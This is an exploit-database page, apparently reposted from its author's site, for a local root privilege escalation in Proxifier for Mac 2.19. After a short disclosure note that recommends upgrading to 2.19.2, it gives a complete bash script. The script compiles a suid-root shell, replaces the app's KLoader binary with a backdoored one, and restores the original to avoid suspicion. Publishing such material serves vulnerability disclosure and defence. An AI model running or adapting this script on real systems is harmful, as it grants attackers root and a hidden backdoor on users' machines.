首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Proxifier for Mac 2.19 - Local root Privilege Escalation
来源:https://m4.rkw.io/ 作者:Wadham 发布时间:2017-12-06  
# With CVE-2017-7643 I disclosed a command injection vulnerablity in the KLoader
# binary that ships with Proxifier <= 2.18.
#
# Unfortunately 2.19 is also vulnerable to a slightly different attack that
# yields the same result.
#
# When Proxifier is first run, if the KLoader binary is not suid root it gets
# executed as root by Proxifier.app (the user is prompted to enter an admin
# password).  The KLoader binary will then make itself suid root so that it
# doesn't need to prompt the user again.
#
# The Proxifier developers added parameter sanitisation and kext signature
# verification to the KLoader binary as a fix for CVE-2017-7643 but Proxifier.app
# does no verification of the KLoader binary that gets executed as root.
#
# The directory KLoader sits in is not root-owned so we can replace it with
# our own binary that will get executed as root when Proxifier starts.
#
# To avoid raising any suspicion, as soon we get executed as root we can swap
# the real KLoader binary back into place and forward the execution call on
# to it.  It does require the user to re-enter their credentials the next time
# Proxifier is run but it's likely most users wouldn't think anything of this.
#
# Users should upgrade to version 2.19.2.
#
# https://m4.rkw.io/proxifier_privesc_219.sh.txt
# 3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
# -------------------------------------------------------------------
 
#!/bin/bash
 
#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19                                           #
#####################################################################
# by m4rkw,  shouts to #coolkids :P                                 #
#####################################################################
 
cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>
 
int main()
{
  setuid(0);
  seteuid(0);
 
  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF
 
gcc -o /tmp/a a.c
 
cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
 
int main(int ac, char *av[])
{
  if (geteuid() != 0) {
    printf("KLoader: UID not set to 0\n");
    return 104;
  } else {
    seteuid(0);
    setuid(0);
 
    chown("/tmp/a", 0, 0);
    chmod("/tmp/a", strtol("4755", 0, 8));
    rename("/Applications/Proxifier.app/Contents/KLoader2", "/Applications/Proxifier.app/Contents/KLoader");
    chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
    chmod("/Applications/Proxifier.app/Contents/KLoader", strtol("4755", 0, 8));
    execv("/Applications/Proxifier.app/Contents/KLoader", av);
 
    return 0;
  }
}
EOF
 
mv -f /Applications/Proxifier.app/Contents/KLoader /Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c
 
echo "Backdoored KLoader installed, the next time Proxifier starts /tmp/a will become suid root."
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Hashicorp vagrant-vmware-fusio
·Claymore's Dual Miner 10.1 Sta
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Sera 1.2 - Local root Privileg
·Hashicorp vagrant-vmware-fusio
·Hashicorp vagrant-vmware-fusio
·Arq 5.9.6 - Local root Privile
·Murus 1.4.11 - Local root Priv
·Arq 5.9.7 - Local root Privile
·WinduCMS 3.1 - Local File Disc
·VX Search 10.2.14 - 'command_n
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved